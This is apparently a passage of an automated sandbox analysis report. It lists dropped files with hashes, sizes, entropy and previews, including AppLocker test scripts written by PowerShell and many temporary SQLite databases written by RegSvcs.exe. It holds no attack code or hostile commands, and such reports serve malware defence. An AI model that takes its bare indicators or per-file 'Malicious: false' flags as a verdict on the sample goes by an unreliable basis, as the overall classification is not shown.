SSDEEP:	48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHxLHG1qHjHKd2:vq5qxqdqolqztYqh3oPtI6mq7qoT5RL9
MD5:	3D3B62B70DF65C6D62C6B068D7256706
SHA1:	03CCEE715BD3299367368426E025742C869155B0
SHA-256:	7373A8D46BC57A95D1C80A2FCD34FF0238B7A0981147FBEA9C28F32F46C653BB
SHA-512:	E259F86B1107BCBFA7F72AB3D199F13AF10644848398DD02D22012B626F353A9EE6865A16E5EA39A7657727D3DA6384F7EA424D8ADEA8F4162C106E90737D559
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulVmdtZ:NllUM
MD5:	013016A37665E1E37F0A3576A8EC8324
SHA1:	260F55EC88E3C4D384658F3C18C7FDEF202E47DD
SHA-256:	20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
SHA-512:	99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5tkldmg.g5m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oku3m0ak.wrk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkshgdx2.132.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ukp3nqaj.daf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp10CF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp10DF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp115D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp11FA.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp120B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp121C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp123C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4841.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4852.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4862.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4873.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4874.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4885.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp48A5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp48B5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp48B6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7D35.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7D36.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7D47.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7D57.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7D68.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7D78.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
